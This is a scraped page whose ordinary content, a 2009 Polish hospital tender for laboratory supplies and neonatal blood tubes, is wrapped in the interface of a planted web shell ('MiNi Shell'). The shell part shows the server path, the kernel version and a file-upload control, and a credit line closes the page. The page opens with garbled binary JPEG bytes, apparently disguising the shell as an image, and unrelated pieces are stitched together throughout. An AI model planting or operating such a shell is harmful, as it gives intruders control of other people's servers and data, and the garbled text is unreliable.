JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090720/115415-N-2009.html

<p class="kh_header"><b>Katowice: Dostawa drobnego sprzętu laboratoryjnego oraz probówek do pobierania krwi u noworodków.</b><br>
<b>Numer ogłoszenia: 115415 - 2009; data zamieszczenia: 20.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Centralny Szpital Kliniczny im. Prof. Kornela Gibińskiego Śląskiej Akademii Medycznej w Katowicach , ul. Medyków 14, 40-752 Katowice, woj. śląskie, tel. 032 7894131, faks 032 2526727, 7894001-02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.csk.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa drobnego sprzętu laboratoryjnego oraz probówek do pobierania krwi u noworodków..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa drobnego sprzętu laboratoryjnego oraz probówek do pobierania krwi u noworodków. Zamówienie składa się z 2 części tzw. pakietów, z których każdy stanowi oddzielny przedmiot zamówienia:
Pakiet nr 1 -  Drobny sprzęt laboratoryjny 
Pakiet nr 2 -  Probówki do pobierania krwi u noworodków,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 33.19.25.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawijący nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy którzy:
a.posiadają uprawnienie do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
b.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
c.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
d.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego
2.Wybrany w wyniku niniejszego postępowania Wykonawca będzie dostarczał na swój koszt przedmiot zamówienia do magazynu Zamawiającego.  
3.Zamawiający wymaga zaoferowania minimum 6 miesięcznego okresu ważności (przydatności do użycia) licząc od daty dostawy (dla pakietu nr 1)
4.Wymagana stałość ceny przez okres trwania umowy.
5.Termin płatności - do 30 dni od dnia odbioru przedmiotu zamówienia i otrzymania oryginału faktury. (Faktura winna być dostarczona wraz z towarem w czytelnie opisanej kopercie).
6.Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
6.W zakresie wyrobów medycznych przedmiot i warunki realizacji niniejszego zamówienia winny być zgodne z ustawą o wyrobach medycznych z dnia 20 kwietnia 2004r. (Dz.U. z 2004r Nr 93, poz.896) oraz z innymi obowiązującymi przepisami prawnymi w tym zakresie.
7.Zamawiający dopuszcza możliwość składania ofert częściowych na całość zamówienia lub według pakietów określonych w pkt. II SIWZ.
8.Zamawiający dopuszcza możliwość składania ofert dotyczących produktów równoważnych do wskazanego przedmiotu zamówienia. 
9.Spełnienie przez wykonawcę warunków udziału w postępowaniu zamawiający będzie oceniał  na podstawie dokumentów zawartych w ofercie 
wg zasad: -spełnia-, - nie spełnia-..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wypełniony czytelnie, podpisany i opieczętowany przez osobę uprawnioną osoby uprawnione do reprezentowania wykonawcy formularz oferty według druku stanowiącego załącznik nr 1 do SIWZ.
2.Wypełniony czytelnie, podpisany i opieczętowany przez osobę uprawnioną  osoby uprawnione do reprezentowania wykonawcy formularz oświadczeń według druku stanowiącego załącznik nr 2 do SIWZ.
3.Wypełniony czytelnie, podpisany i opieczętowany przez osobę uprawnioną osoby uprawnione do reprezentowania wykonawcy formularz asortymentowo-cenowy według druku stanowiącego załącznik nr 3.1, 3.2 do SIWZ wraz z opisem oferowanego przedmiotu zamówienia.
4.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.Zaświadczenie podmiotu uprawnionego do kontroli jakości, potwierdzające, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym tj.:
5.1.W odniesieniu do wyrobów medycznych deklaracja zgodności z wymaganiami zasadniczymi CE i - o ile jest to wymagane odrębnymi przepisami - certyfikat jednostki notyfikowanej, Wpis do Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i do używania o ile jest wymagany odrębnymi przepisami, instrukcję używania probówek oraz karty charakterystyki (dla pakietu nr 1)
6.Próbki oferowanego przedmiotu zamówienia zgodnie z zapisami w formularzach asortymentowo-cenowych (po jednej sztuce z każdego asortymentu).
7.Pełnomocnictwo - jeśli Wykonawcę reprezentuje pełnomocnik.
8.Wszystkie kserokopie i odpisy wymaganych dokumentów i oświadczeń  muszą być poświadczone za zgodność z oryginałem przez wykonawcę  (osobę uprawnioną/ osoby uprawnione do reprezentowania wykonawcy)  i opatrzone pieczęcią imienną identyfikującą tą osobę/y. 
9.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  stosuje się odpowiednio  § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U z 2006r Nr 87, poz.605) tzn. zamiast dokumentów określonych w pkt.V.4 składa dokument lub dokumenty, wystawione w kraju w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się tych dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
10.Dla wykonawców występujących wspólnie ma w szczególności zastosowania art. 23 Prawa zamówień publicznych. Oferta winna zawierać dokument potwierdzający ustanowienie pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Warunki określone w art. 22 ust. 1 pkt 2 i 3 Prawa zamówień publicznych mogą być spełnione przez jednego z wykonawców lub wykonawców łącznie. Pozostałe warunki dotyczące wykonawcy stosuje się odpowiednio do wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.csk.katowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Centralny Szpital Kliniczny im. prof. Kornela Gibińskiego Śląskiego Uniwersytetu Medycznego w Katowicach ul. Medyków 14, 40-752 Katowice, pok.PP 131 (Dział Zamówień Publicznych).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2009 godzina 11:30, miejsce: Samodzielny Publiczny Centralny Szpital Kliniczny im. prof. Kornela Gibińskiego Śląskiego Uniwersytetu Medycznego w Katowicach ul. Medyków 14, 40-752 Katowice, pok.PP 131 (Dział Zamówień Publicznych).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> drobny sprzęt laboratoryjny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Końcówki do pipet automatycznych o poj. do 200?l (żółte) -45 000 szt
2.Końcówki do pipet automatycznych o poj. do 1000?l (niebieskie)	-6 000 szt
3.Końcówki do pipet automatycznych o poj. do 5000?l - 1 200 szt
4.Pipeta pasteurowska jednorazowego użytku  o poj. 3,5 ml z polipropylenu -
50 000szt
5.Pipeta automatyczna o zmiennej pojemności w zakresie1000-5000?l - 3 szt
6.Bagietki proste z polipropylenu, śr. 4mm, dł 125mm -200 szt
7.Probówki z PS  przeźroczyste, okrągłodenne o poj 4ml,śr. 12mm, dł 75mm-72 000 szt
8.Probówki z polistyrenu przeźroczyste, okrągłodenne o poj  3 ml, śr. 12mm,  dł 55mm-24 000 szt
9.Probówki stożkowe wirówkowe z PP z podziałką-23 000 szt
10.Probówki z dnem stożkowym z polipropylenu, bezbarwne,o poj.1,5mm-2 000 szt
11.Probówki z odczynnikiem (błękit brylantowo-krezolony) i szczelnym  korkiem do barwienia i zliczania retikulocytów  powinny umożliwić wykonanie oznaczenia ze 120 ul krwi wersenianowej. Ważność odczynnika w momencie dostarczenia minimum 6 miesięcy.- 1 000 szt
12.Probówki z korkiem, plastikowe, o pojemności  10 - 11ml, średnicy 15 mm i wysokości 90 mm-800 szt
13.Probówki z PS przeźroczyste, jałowe o pojemności  okrągłodenne o poj. 8 ml. ,  śr. 16mm -75mm-12 000 szt
14.Korki do probówek z polipropyleny o śr. 12mm w sześciu  różnych kolorach: białym, żółtym, zielonym, czerwonym, niebieskim, fioletowym-6000 szt
15.Pojemniki na kał z łopatką o poj. 25ml-1 800 szt
16.Pojemniki na mocz o pojemności min. 125ml zamykane pokrywą zawierającą wypustkę do obcięcia i pozyskania zawartego wewnątrz materiału-36 000 szt
17.Jednorazowe płyty stosowane przy oznaczeniu grup krwi z 7 -mioma wgłębieniami w rzędzie (białe), (zabezpieczenie 30 600 dołków)-1 800 szt
18.Jednorazowe płyty stosowane przy oznaczeniu grup krwi z 6 -cioma wgłębieniami w rzędzie (białe), (zabezpieczenie 30 600 dołków)-1 800 szt
19.Pisaki koloru czarnego, cięńkopiszące  odporne na działanie alkoholu do szkłą laboratoryjnego-500 szt
20.Pisaki koloru czarnego, średniogrubo piszące  odporne na działanie alkoholu do szkłą laboratoryjnego -500 szt
21.Statywy z polipropylenu na 60 probówek o śr 11-13mm, 6-cio rzędowy, wysokość statywu 50mm - 20 szt
22.Statywy z polipropylenu na 60 probówek o  śr 13-15mm, 6-cio rzędowy, wysokość statywu 60mm - 20 szt
23.Szczotki z włosia  do mycia butelek 350mm/130 mm i śr. 50 mm 	- 12 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> probówki do pobierania krwi u noworodków.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Probówka z kapilarą end-to-end do pobirania krwi u noworodków do morfologii z włośniczki. Probówka po całej długości o jednolitej średnicy, samostojąca z kapilarą o pojemności 200?l. Mocowanie korka bez elementów wystających, gwarantujących prawidłowe mieszanie. Korek zamykający umieszczony na probówce. - 1200 szt
2.Probówka z LH  o pojemności 300?l do oznaczania laktatów (kwas mlekowy) we krwi u noworodków. Korekzamykający umieszczony na probówce. -  200 szt
3.Probówka  do pobierania krwi z włośniczki u noworodków do bilirubiny, o pojemności 300?l, samostojąca. Korek zamykający umieszczony na probówce. - 700 szt
4.Probówka do pobirania krwi u noworodków z żyły do morfologii. Probówkao pojemności 1,3ml,  przeźroczysta po całej długości o jednolitej średnicy, samostojąca z korkiem, gwarantująca prawidłowe mieszanie. Korek zamykający umieszczony na probówce. -700 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com